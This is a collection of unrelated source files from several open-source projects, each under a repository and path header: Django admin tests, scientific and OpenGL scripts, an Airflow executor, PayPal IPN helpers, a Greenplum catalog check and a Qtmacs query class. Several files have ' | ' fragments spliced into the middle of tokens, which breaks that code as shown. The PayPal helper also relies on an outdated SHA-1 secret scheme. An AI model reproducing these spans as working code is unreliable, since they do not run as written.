position_level=0,
max_num_selected_candidates=2,
election=cls._election0
)
_position1 = CandidatePosition.objects.create(
position_name='Amazing Position 1',
position_level=1,
max_num_selected_candidates=1,
election=cls._election1
)
_candidate0 = Candidate.objects.create(
user=_voted_user0,
party=_party0,
position=_position0,
election=cls._election0
)
_candidate1 = Candidate.objects.create(
user=_voted_user1,
party=_party1,
position=_position1,
election=cls._election1
)
admin = User.objects.create(
username='admin',
type=UserType.ADMIN
)
admin.set_password('root')
admin.save()
def setUp(self):
self.client | .login(username='admin', password='root')
# We have to refresh _ba | tch0 since it gets modified in many tests.
# Modifications to an object created inside setUpTestData() in a test
# method will persist across test methods. Fortunately, the changes
# are only present in memory. So, we can just refresh the original
# content of the object from the database using refresh_from_db().
# For more related information, you may visit this page:
# https://docs.djangoproject.com
# /en/2.2/topics/testing/tools/
# #django.test.TestCase.setUpTestData
self._batch0.refresh_from_db()
def test_change_view_denies_anonymous_users(self):
self.client.logout()
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_denies_voters(self):
self.client.login(username='pedro', password='pendoko')
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_post_denies_anonymous_users(self):
self.client.logout()
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_post_denies_voters(self):
self.client.login(username='pedro', password='pendoko')
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_shows_form(self):
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
self.assertTemplateUsed(response, 'admin/change_form.html')
def test_change_view_voter_saves_no_election_change(self):
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
{
'year': self._batch0.year + 10,
'election': self._batch0.election.id,
'_save': 'Save'
},
follow=True
)
self._batch0.refresh_from_db()
self.assertEqual(self._batch0.year, 10)
self.assertEqual(self._batch0.election.id, self._election0.id)
self.assertEqual(Candidate.objects.all().count(), 2)
self.assertRedirects(response, reverse('admin:core_batch_changelist'))
def test_change_view_voter_saves_continue_editing_no_election_change(self):
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
{
'year': self._batch0.year + 10,
'election': self._batch0.election.id,
|
hrautila/go.opt | tests/py/testsdp.py | Python | lgpl-3.0 | 1,573 | 0.019072 | #
# This is copied from CVXOPT examples and modified to be used as test reference
# for corresponding Go program.
#
import sys
from cvxopt import matrix, solvers
import helpers
import localcones
def testsdp(opts):
c = matrix([1.,-1.,1.])
G = [ matrix([[-7., -11., -11., 3.],
[ 7., -18., -18., 8.],
[-2., -8., -8., 1.]]) ]
G += [ matrix([[-21., -11., 0., -11., 10., 8., 0., 8., 5.],
[ 0., 10., 16., 10., -10., -10., | 16., -10., 3.],
[ -5., 2., -17., 2., -6., 8., -17., -7., 6.]]) ]
h = [ matrix([[33., -9.], [-9., 26.]]) ]
h += [ matrix([[14., 9., 40.], [9., 91., 10.], [40., 10., 15.]]) ]
solvers.options.update(opts)
sol = solvers.sdp(c, Gs=G, hs=h)
#localcones.options.update(opts)
#sol = localcones.sdp(c | , Gs=G, hs=h)
print "x = \n", helpers.str2(sol['x'], "%.9f")
print "zs[0] = \n", helpers.str2(sol['zs'][0], "%.9f")
print "zs[1] = \n", helpers.str2(sol['zs'][1], "%.9f")
print "\n *** running GO test ***"
rungo(sol)
def rungo(sol):
helpers.run_go_test("../testsdp", {'x': sol['x'],
'ss0': sol['ss'][0],
'ss1': sol['ss'][1],
'zs0': sol['zs'][0],
'zs1': sol['zs'][1]})
if len(sys.argv[1:]) > 0:
if sys.argv[1] == "-sp":
helpers.sp_reset("./sp.data")
helpers.sp_activate()
testsdp({'maxiters': 20})
|
szecsi/Gears | GearsPy/Project/Components/Forward/Flyby.py | Python | gpl-2.0 | 2,803 | 0.0264 | import Gears as gears
from .. import *
try:
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('ERROR: PyOpenGL not installed properly.')
import random
def box() :
glBegin(GL_QUADS)
glColor3f(0.0,1.0,0.0)
glVertex3f(1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(1.0, 1.0, 1.0)
glColor3f(1.0,0.5,0.0)
glVertex3f(1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(1.0,-1.0,-1.0)
glColor3f(1.0,0.0,0.0)
glVertex3f(1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(1.0,-1.0, 1.0)
glColor3f(1.0,1.0,0.0)
glVertex3f(1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(1.0, 1.0,-1.0)
glColor3f(0.0,0.0,1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0, 1.0)
glColor3f(1.0,0.0,1.0)
glVertex3f(1.0, 1.0,-1.0)
glVertex3f(1.0, 1.0, 1.0)
glVertex3f(1.0,-1.0, 1.0)
glVertex3f(1.0,-1.0,-1.0)
glEnd()
class Flyby() :
args = None
def __init__(self, **args):
self.args = args
def apply(self, stimulus) :
self.applyWithArgs(stimulus, **self.args)
def applyWithArgs(
self,
stimulus,
) :
stimulus.enableColorMode()
stimulus.setForwardRenderingCallback(self.render)
stimulus.registerCallback(gears.StimulusStartEvent.typeId, self.start)
stimulus.registerCallback(gears.StimulusEndEvent.typeId, self.finish)
def start( self, event ):
print('hello start flyby')
self.glist = glGenLists(1)
glNewList(self.glist, GL_COMPILE)
for i in range(0, 400) :
glPushMatrix()
glTranslated(
random.uniform( a = -20, b = 20),
random | .uniform( a = -20, b = 20),
random.uniform( a = -20, b = | 20),
)
box()
glPopMatrix()
glEndList()
def finish( self, event ):
glDeleteLists(self.glist, 1)
def render(self, iFrame):
glEnable(GL_DEPTH_TEST)
glDepthMask(GL_TRUE);
glClearColor(0.0, 0.0, 0.0, 1.0 )
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(45, 1, 0.1, 1000)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0, 0, 20- iFrame * 0.1, 0, 0, 19 - iFrame * 0.1, 0, 1, 0)
glTranslated(0, 0, -40 * (iFrame // 400))
glCallList(self.glist)
glTranslated(0, 0, -40)
glCallList(self.glist)
glDisable(GL_DEPTH_TEST)
glDepthMask(GL_FALSE);
|
dhuang/incubator-airflow | airflow/executors/dask_executor.py | Python | apache-2.0 | 4,430 | 0.000903 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
DaskExecutor
.. seealso::
For more information on how the DaskExecutor works, take a look at the guide:
:ref:`executor:DaskExecutor`
"""
import subprocess
from typing import Any, Dict, Optional
from distributed import Client, Future, as_completed
from distributed.security import Security
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.base_executor import NOT_STARTED_MESSAGE, BaseExecutor, CommandType
from airflow.models.taskinstance import TaskInstanceKey
class DaskExecutor(BaseExecutor):
"""DaskExecutor submits tasks | to a Dask Distributed cluster.""" |
def __init__(self, cluster_address=None):
super().__init__(parallelism=0)
if cluster_address is None:
cluster_address = conf.get('dask', 'cluster_address')
if not cluster_address:
raise ValueError('Please provide a Dask cluster address in airflow.cfg')
self.cluster_address = cluster_address
# ssl / tls parameters
self.tls_ca = conf.get('dask', 'tls_ca')
self.tls_key = conf.get('dask', 'tls_key')
self.tls_cert = conf.get('dask', 'tls_cert')
self.client: Optional[Client] = None
self.futures: Optional[Dict[Future, TaskInstanceKey]] = None
def start(self) -> None:
if self.tls_ca or self.tls_key or self.tls_cert:
security = Security(
tls_client_key=self.tls_key,
tls_client_cert=self.tls_cert,
tls_ca_file=self.tls_ca,
require_encryption=True,
)
else:
security = None
self.client = Client(self.cluster_address, security=security)
self.futures = {}
def execute_async(
self,
key: TaskInstanceKey,
command: CommandType,
queue: Optional[str] = None,
executor_config: Optional[Any] = None,
) -> None:
self.validate_command(command)
def airflow_run():
return subprocess.check_call(command, close_fds=True)
if not self.client:
raise AirflowException(NOT_STARTED_MESSAGE)
future = self.client.submit(airflow_run, pure=False)
self.futures[future] = key # type: ignore
def _process_future(self, future: Future) -> None:
if not self.futures:
raise AirflowException(NOT_STARTED_MESSAGE)
if future.done():
key = self.futures[future]
if future.exception():
self.log.error("Failed to execute task: %s", repr(future.exception()))
self.fail(key)
elif future.cancelled():
self.log.error("Failed to execute task")
self.fail(key)
else:
self.success(key)
self.futures.pop(future)
def sync(self) -> None:
if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
# make a copy so futures can be popped during iteration
for future in self.futures.copy():
self._process_future(future)
def end(self) -> None:
if not self.client:
raise AirflowException(NOT_STARTED_MESSAGE)
if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
self.client.cancel(list(self.futures.keys()))
for future in as_completed(self.futures.copy()):
self._process_future(future)
def terminate(self):
if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
self.client.cancel(self.futures.keys())
self.end()
|
Versatilus/dragonfly | dragonfly/examples/test_multiple_dictation.py | Python | lgpl-3.0 | 7,289 | 0.003841 | """
Multiple dictation constructs
===============================================================================
This file is a showcase investigating the use and functionality of multiple
dictation elements within Dragonfly speech recognition grammars.
The first part of this file (i.e. the module's doc string) contains a
description of the functionality being investigated along with test code
and actual output in doctest format. This allows the reader to see what
really would happen, without needing to load the file into a speech
recognition engine and put effort into speaking all the showcased
commands.
The test code below makes use of Dragonfly's built-in element testing tool.
When run, it will connect to the speech recognition engine, load the element
being tested, mimic recognitions, and process the recognized value.
Multiple consecutive dictation elements
-------------------------------------------------------------------------------
>>> tester = ElementTester(RuleRef(ConsecutiveDictationRule()))
>>> print(tester.recognize("consecutive Alice Bob Charlie"))
Recognition: "consecutive Alice Bob Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- consecutive (1)
- Alice (1000000)
- Bob (1000000)
- Charlie (1000000)
Extras:
- dictation1: Alice
- dictation2: Bob
- dictation3: Charlie
>>> print(tester.recognize("consecutive Alice Bob"))
RecognitionFailure
|
Mixed literal and dictation elements
-------------------------------------------------------------------------------
Here we will investigate mixed, i.e. interspersed, fixed literal command
words and dynamic dictation elements. We will use the "MixedDictationRule"
class which has a spec | of
"mixed [<dictation1>] <dictation2> command <dictation3>".
Note that "<dictation1>" was made optional instead of "<dictation2>"
because otherwise the first dictation elements would always gobble up
all dictated words. There would (by definition) be no way to distinguish
which words correspond with which dictation elements. Such consecutive
dictation elements should for that reason be avoided in real command
grammars. The way the spec is defined now, adds some interesting
dynamics, because of the order in which they dictation elements parse
the recognized words. However, do note that that order is well defined
but arbitrarily chosen.
>>> tester = ElementTester(RuleRef(MixedDictationRule()))
>>> print(tester.recognize("mixed Alice Bob command Charlie"))
Recognition: "mixed Alice Bob command Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- mixed (1)
- Alice (1000000)
- Bob (1000000)
- command (1)
- Charlie (1000000)
Extras:
- dictation1: Alice
- dictation2: Bob
- dictation3: Charlie
>>> print(tester.recognize("mixed Alice command Charlie"))
Recognition: "mixed Alice command Charlie"
Word and rule pairs: ("1000000" is "dgndictation")
- mixed (1)
- Alice (1000000)
- command (1)
- Charlie (1000000)
Extras:
- dictation2: Alice
- dictation3: Charlie
>>> print(tester.recognize("mixed Alice Bob command"))
RecognitionFailure
>>> print(tester.recognize("mixed command Charlie"))
RecognitionFailure
Repetition of dictation elements
-------------------------------------------------------------------------------
Now let's take a look at repetition of dictation elements. For this
we will use the "RepeatedDictationRule" class, which defines its spec
as a repetition of "command <dictation>". I.e. "command Alice" will
match, and "command Alice command Bob" will also match.
Note that this rule is inherently ambiguous, given the lack of a
clear definition of grouping or precedence rules for fixed literal
words in commands, and dynamic dictation elements. As an example,
"command Alice command Bob" could either match 2 repetitions with
"Alice" and "Bob" as dictation values, or a single repetition with
"Alice command Bob" as its only dictation value. The tests below
the show which of these actually occurs.
>>> tester = ElementTester(RuleRef(RepeatedDictationRule()))
>>> print(tester.recognize("command Alice"))
Recognition: "command Alice"
Word and rule pairs: ("1000000" is "dgndictation")
- command (1)
- Alice (1000000)
Extras:
- repetition: [[u'command', NatlinkDictationContainer(Alice)]]
>>> print(tester.recognize("command Alice command Bob"))
Recognition: "command Alice command Bob"
Word and rule pairs: ("1000000" is "dgndictation")
- command (1)
- Alice (1000000)
- command (1000000)
- Bob (1000000)
Extras:
- repetition: [[u'command', NatlinkDictationContainer(Alice, command, Bob)]]
"""
#---------------------------------------------------------------------------
import doctest
from dragonfly import *
from dragonfly.test.infrastructure import RecognitionFailure
from dragonfly.test.element_testcase import ElementTestCase
from dragonfly.test.element_tester import ElementTester
#---------------------------------------------------------------------------
class RecognitionAnalysisRule(CompoundRule):
"""
Base class that implements reporting in human-readable format
details about the recognized phrase. It is used by the actual
testing rules below, and allows the doctests above to be easily
readable and informative.
"""
def _process_recognition(self, node, extras):
Paste(text).execute()
def value(self, node):
return self.get_recognition_info(node)
def get_recognition_info(self, node):
output = []
output.append('Recognition: "{0}"'.format(" ".join(node.words())))
output.append('Word and rule pairs: ("1000000" is "dgndictation")')
for word, rule in node.full_results():
output.append(" - {0} ({1})".format(word, rule))
output.append("Extras:")
for key in sorted(extra.name for extra in self.extras):
extra_node = node.get_child_by_name(key)
if extra_node:
output.append(" - {0}: {1}".format(key, extra_node.value()))
return "\n".join(output)
#---------------------------------------------------------------------------
class ConsecutiveDictationRule(RecognitionAnalysisRule):
spec = "consecutive <dictation1> <dictation2> <dictation3>"
extras = [Dictation("dictation1"),
Dictation("dictation2"),
Dictation("dictation3")]
#---------------------------------------------------------------------------
class MixedDictationRule(RecognitionAnalysisRule):
spec = "mixed [<dictation1>] <dictation2> command <dictation3>"
extras = [Dictation("dictation1"),
Dictation("dictation2"),
Dictation("dictation3")]
#---------------------------------------------------------------------------
class RepeatedDictationRule(RecognitionAnalysisRule):
spec = "<repetition>"
extras = [Repetition(name="repetition",
child=Sequence([Literal("command"),
Dictation()]))]
#---------------------------------------------------------------------------
def main():
engine = get_engine()
engine.connect()
try:
doctest.testmod(verbose=True)
finally:
engine.disconnect()
if __name__ == "__main__":
main()
|
StephanH84/reinforcement_learning_explorations | tensorflow/src/MNIST1.py | Python | mit | 912 | 0.009868 | from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
W = tf.Variable(tf | .zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.matmul(x,W) + b
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entr | opy)
for _ in range(1000):
batch = mnist.train.next_batch(100)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels})) |
cloudrain21/hamsterdb | python/setup.py | Python | apache-2.0 | 505 | 0.007921 |
from distutils.core import setup, Extension
module1=Extension('hamsterdb',
libraries=['hamsterdb'],
include_dirs=['../include'],
li | brary_dirs=['../src/.libs'],
s | ources=['src/python.cc'])
setup(name='hamsterdb-python',
version='2.1.8',
author='Christoph Rupp',
author_email='chris@crupp.de',
url='http://hamsterdb.com',
description='This is the hamsterdb wrapper for Python',
license='Apache Public License 2',
ext_modules=[module1])
|
CopyChat/Plotting | Python/download_era-interim.py | Python | gpl-3.0 | 1,297 | 0.048574 | #!/usr/bin/python
import os
from ecmwfapi import ECMWFDataServer
server = ECMWFDataServer()
time=["06"]
year=["2013"]
param=["129.128","130.128","131.128","132.128","157.128","151.128"]
nam=["hgt","air","uwnd","vwnd","rhum","psl"]
#month=["01","02","03","04","05","06","07","08","09","10","11","12"]
for y in year:
#for m in month:
for p in range(len(param)):
for t in time:
date=y+"-01-01/to/"+y+"-12-31"
print date
print nam[p]+"."+y+"."+t+".nc"
os.system('echo "############################################################# ^_^"')
server.retrieve({
'dataset' : "interim",
'levelist' : "1/2/3/5/7/10/20/30/50/70/100/125/150/175/200/225/250/300/350/400/450/500/550/600/650/700/750/775/800/825/850/875/900/925/950/975/1000",
'step' : "0",
'number' : "all",
'levtype' : "pl", # set to "sl" for surface level
'date' : date,
'time' : t ,
'origin' : "all",
'type' | : | "an",
'param' : "129.128/130.128/131.128/132.128/157.128",
'param' : param[p],
'area' : "0/0/-40/100", # Four values as North/West/South/East
'grid' : "1.5/1.5", # Two values: West-East/North-South increments
'format' : "netcdf", # if grib, just comment this line
'target' : nam[p]+"."+y+"."+t+".nc"
})
|
TonyEight/tundle | tundle/urls.py | Python | mit | 428 | 0.004673 | # coding=utf-8
# This will force all string to be unicode strings, even if we don't
# set the 'u'
from __future_ | _ import unicode_literals
# Django modules imports
from django.conf.urls import patterns, include, | url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Frontend URLs
url(r'^', include('frontend.urls')),
# Admin URLs
url(r'^admin/', include(admin.site.urls)),
)
|
CLVsol/oehealth | oehealth_insured_group/oehealth_insured_group_member.py | Python | agpl-3.0 | 2,443 | 0.010643 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# | #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from osv import osv
from osv import fie | lds
class oehealth_insured_group_member(osv.Model):
_name = 'oehealth.insured.group.member'
_columns = {
'insured_group_id': fields.many2one('oehealth.insured.group', string='Insured Group',
help='Insured Group Titular'),
'insured_id': fields.many2one('oehealth.insured', string='Insured',
help='Insured Group Member Name'),
'role': fields.many2one('oehealth.insured.group.member.role', 'Role', required=True),
'kinship': fields.many2one('oehealth.insured.group.member.kinship', 'Kinship', required=False),
'info': fields.text(string='Info'),
'tag_ids': fields.many2many('oehealth.tag',
'oehealth_insured_group_member_tag_rel',
'insured_group_member_id',
'tag_id',
'Tags'),
}
oehealth_insured_group_member()
|
zsuzhengdu/camp | paypal/standard/helpers.py | Python | mit | 2,448 | 0.007761 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf import settings
def duplicate_txn_id(ipn_obj):
"""Returns True if a record with this transaction id exists and it is not
a payment which has gone from pending to completed.
"""
query = ipn_obj._default_manager.filter(txn_id = ipn_obj.txn_id)
if ipn_obj.payment_status == "Completed":
# A payment that was pending and is now completed will have the same
# IPN transaction id, so don't flag them as duplicates because it
# means that the payment was finally successful!
query = query.exclude(payment_status = "Pending")
return query.count() > 0
def make_secret(form_instance, secret_fields=None):
"""
Returns a secret for use in a EWP form or an IPN verification based on a
selection of variables in params. Should only be used with SSL.
"""
# @@@ Moved here as temporary fix to avoid dependancy on auth.models.
from django.contrib.auth.models import get_hexdigest
# @@@ amount is mc_gross on the IPN - where should mapping logic go?
# @@@ amount / mc_gross is not nessecarily returned as it was sent - how to use it? 10.00 vs. 10.0
# @@@ the secret should be based on the invoice or custom fields as well - otherwise its always the same.
# | Build the secret with fields availible in both PaymentForm and the IPN. Orde | r matters.
if secret_fields is None:
secret_fields = ['business', 'item_name']
data = ""
for name in secret_fields:
if hasattr(form_instance, 'cleaned_data'):
if name in form_instance.cleaned_data:
data += unicode(form_instance.cleaned_data[name])
else:
# Initial data passed into the constructor overrides defaults.
if name in form_instance.initial:
data += unicode(form_instance.initial[name])
elif name in form_instance.fields and form_instance.fields[name].initial is not None:
data += unicode(form_instance.fields[name].initial)
secret = get_hexdigest('sha1', settings.SECRET_KEY, data)
return secret
def check_secret(form_instance, secret):
"""
Returns true if received `secret` matches expected secret for form_instance.
Used to verify IPN.
"""
# @@@ add invoice & custom
# secret_fields = ['business', 'item_name']
return make_secret(form_instance) == secret
|
50wu/gpdb | gpMgmt/bin/gpcheckcat_modules/unique_index_violation_check.py | Python | apache-2.0 | 2,547 | 0.002748 | #!/usr/bin/env python3
class UniqueIndexViolationCheck:
unique_indexes_query = """
select table_oid, index_name, table_name, array_agg(attname) as column_names
from pg_attribute, (
select pg_index.indrelid as table_oid, index_class.relname as index_name, table_class.relname as table_name, unnest(pg_index.indkey) as column_index
from pg_index, pg_class index_class, pg_class table_class
where pg_index.indisunique='t'
and index_class.relnamespace = (select oid from pg_namespace where nspname = 'pg_catalog')
and index_class.relkind = 'i'
and index_class.oid = pg_index.indexrelid
and table_class.oid = pg_index.indrelid
) as unique_catalog_index_columns
where attnum = column_index
and attrelid = table_oid
group by table_oid, index_name, table_name;
"""
def __init__(self):
self.violated_segments_query = """
select distinct(gp_segment_id) from (
(select gp_segment_id, %s
from gp_dist_random('%s')
where (%s) is not null
group by gp_segment_id, %s
having count(*) > 1)
union
(select gp_segment_id, %s
from %s
where (%s) is not null
group by gp_segment_id, %s
having count(*) > 1)
) as violations
"""
def runCheck(self, db_connection):
unique_indexes = db_connection.query(self.unique_indexes_query).getresult()
violations = []
for (table_oid, index_name, table_name, column_names) in unique_indexes:
column_names = ",".join(column_names)
sql = self.get_violated_segments_query(table_name, c | olumn_names)
violated_segments = db_connection.query(sql).getresult()
if violated_segments:
violations.append(dict(table_oid=table_oid,
table_name=table_name,
index_name=index_name,
column_names=column_names,
| violated_segments=[row[0] for row in violated_segments]))
return violations
def get_violated_segments_query(self, table_name, column_names):
return self.violated_segments_query % (
column_names, table_name, column_names, column_names, column_names, table_name, column_names, column_names
)
|
Akay7/hospital | appointments/views.py | Python | lgpl-3.0 | 757 | 0.001321 | from django.views import generic
from django.http import JsonResponse
from django.core.urlresolvers import reverse_lazy
from .forms import AppointmentForm
from .models import TimeManager
class AppointmentsFormView(generic.FormView):
| form_class = AppointmentForm
success_url = reverse_lazy('appointments:registration')
template_name = 'appointments/appointments.html'
def form_valid(self, form):
form.save()
return super(AppointmentsFormView, self).form_valid(form)
class GetFreeTimeView(generic.View):
def post(self, request):
doctor_id = request.POST.get("doctor_id")
day = request.POST.get('day')
answer = dict(TimeManager.get_free_time(doctor_id, d | ay))
return JsonResponse(answer) |
simondodson/Curator | media_db.py | Python | gpl-3.0 | 935 | 0.041711 | import os
from sqlalchemy import create_engine, ForeignKey, func
from sqlalchemy import Column, Date, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm im | port relationship, backref, sessionmaker
Base = declarative_base()
class Series( Base ):
__tablename__ = 'series'
item = Column( String )
tag = Column( String, primary_key=True )
title = Column( String )
imdb = Column(String)
episodes = relationship( 'Episode', backref='episodes' )
class Episode( Base ):
__tablename__ = 'episode'
tag = Column( String, primary_key=True )
title = Column( String )
path = Column( String )
s | eries = Column( String, ForeignKey( 'series.tag' ) )
season = Column( Integer )
class Movie( Base ):
__tablename__ = 'movie'
id = Column( Integer, primary_key=True )
title = Column( String )
path = Column( String )
imdb = Column( String ) |
olitheolix/qtmacs | qtmacs/miniapplets/base_query.py | Python | gpl-3.0 | 18,531 | 0.000432 | # Copyright 2012, Oliver Nagy <olitheolix@gmail.com>
#
# This file is part of Qtmacs.
#
# Qtmacs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Qtmacs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Qtmacs. If not, see <http://www.gnu.org/licenses/>.
"""
Template class to provide a mini applet query with auto completion and
history.
The user need only overload two methods to provide a list of possible
completions and to implement the action on the final input choice.
Here is an example that provide two default choices ('Yes', and 'No')
that can be auto completed with <tab>, but takes any other input the
user supplies as well and puts them into the history (ie. they are
available for <tab> completion the next time). Once the user hits
<enter> the status mini applet displays the entry. Put this in your
configuration file, start Qtmacs, press `<alt>+x`, type
`ExampleQuery`, and try it out::
class ExampleQuery(QtmacsMacro):
\"\"\"
Demonstrate default query.
\"\"\"
import qtmacs.miniapplets.base_query as base_query
class Query(base_query.MiniAppletBaseQuery):
\"\"\"
Derive from MiniAppletBaseQuery and overload with
custom functionality.
\"\"\"
def generateCompletions(self, entry):
\"\"\"
Return a list of auto-completion options based on the
current ``entry``.
\"\"\"
return ('Yes', 'No')
def inputCompleted(self, userInput):
\"\"\"
Implement the action once the user hits enter.
\"\"\"
self.qteMain.qteStatus('You chose: {}'.format(userInput))
def __init__(self):
super().__init__()
# This macro works with all applets and widgets.
self.qteSetAppletSignature('*')
self.qteSetWidgetSignature('*')
# List of previous entries. Keep this list alive between macros
# calls by saving it as an instance variable (ie. in ``self``).
# Since the ``Query`` instance will add all user entries to this
# list, a history that spans the entire life time of this macro
# can be created.
self.qteQueryHistory = ['Yes', 'No']
def qteRun(self):
# Instantiate the query object and install it as the mini applet.
query = self.Query(self.qteApplet, self.qteWidget,
'**A Yes/No Query**',
prefix='Your choice: ',
history=self.qteQueryHistory)
self.qteMain.qteAddMiniApplet(query)
# Register the macro with Qtmacs.
qteRegisterMacro(ExampleQuery)
It is safe to use::
from base_query import *
"""
import os
import qtmacs.type_check
from PyQt4 import QtCore, QtGui
from qtmacs.base_macro import QtmacsMacro
from qtmacs.base_applet import QtmacsApplet
from qtmacs.base_macro import QtmacsMacro
# Shorthands
type_check = qtmacs.type_check.type_check
# Global variables used by the macros to query and update the
# history. Macros using the ``MiniAppletBaseQuery`` class must
# point ``qteQueryHistory`` to the history (a python list) they would
# like to use.
qteQueryHistory = None
qteHistIdx = None
class AutocompleteInput(QtmacsMacro):
"""
Display all possible completions in a dedicated applet.
This macro executes when the user hits the <tab> key and creates a
new completions applet (a simple ``QTextEdit``) if none exists
yet, or brings an existing one to the front. In either case, the
applet will display a list of all possible completions, ie. a list
of all candidates that contain the user entered string as a
sub-string.
|Signature|
* *applet*: 'MiniApplet'
* *widget*: ``QTextEdit``
"""
def __init__(self):
super().__init__()
self.qteSetAppletSignature('MiniApplet')
self.qteSetWidgetSignature('QTextEdit')
# ID of the completions buffer. Note that this name is
# implicitly agreed upon between this macro and the QueryInput
# macro. Therefore, ensure to change the name in both
# locations if so desired.
self.completionsAppID = '__Buffer Completions__'
def qteRun(self):
# Fetch the text typed into the mini applet by the user.
userInput = self.qteWidget.toPlainText()
# Call the generateCompletions method from the
# ``MiniAppletBaseQuery`` class (the programmer has to
# overload it).
completions = self.qteApplet.generateCompletions(userInput)
# Keep only those entries which contain the user input as a
# sub-string.
if isinstance(completions, list) or isinstance(completions, tuple):
completions = [_ for _ in completions if userInput in _]
else:
completions = None
# Auto-complete as much as possible by displaying the largest
# common prefix of all possible completions. If no such prefix
# exists, then do nothing as otherwise the entry field would
# be wiped clean.
pre = os.path.commonprefix(completions)
if len(pre) > 0:
self.qteWidget.setPlainText(pre)
tc = self.qteWidget.textCursor()
tc.movePosition(QtGui.QTextCursor.EndOfLine)
self.qteWidget.setTextCursor(tc)
# If something could be completed do not proceed to
# show a list of possible completions but return now.
if len(pre) > len(userInput):
return
# If the completion is not unique then list all options,
# otherwise close the completions applet altogether.
if (completions is not None) and (len(completions) > 1):
# Get a handle to the completions buffer or create a new
# one if none exists yet.
app = self.qteMain.qteGetAppletHandle(self.completionsAppID)
if app is None:
app = self.qteMain.qteNewApplet('RichEditor',
self.completionsAppID)
self.qteMain.qteSplitApplet(app)
# Clear the buffer and list the possible completions.
app.qteText.clear()
for _ in completions:
app.qteText.append(_)
else:
self.qteMain.qteKillApplet(self.completionsAppID)
class QueryInput(QtmacsMacro):
"""
Close the mini applet and process the user input.
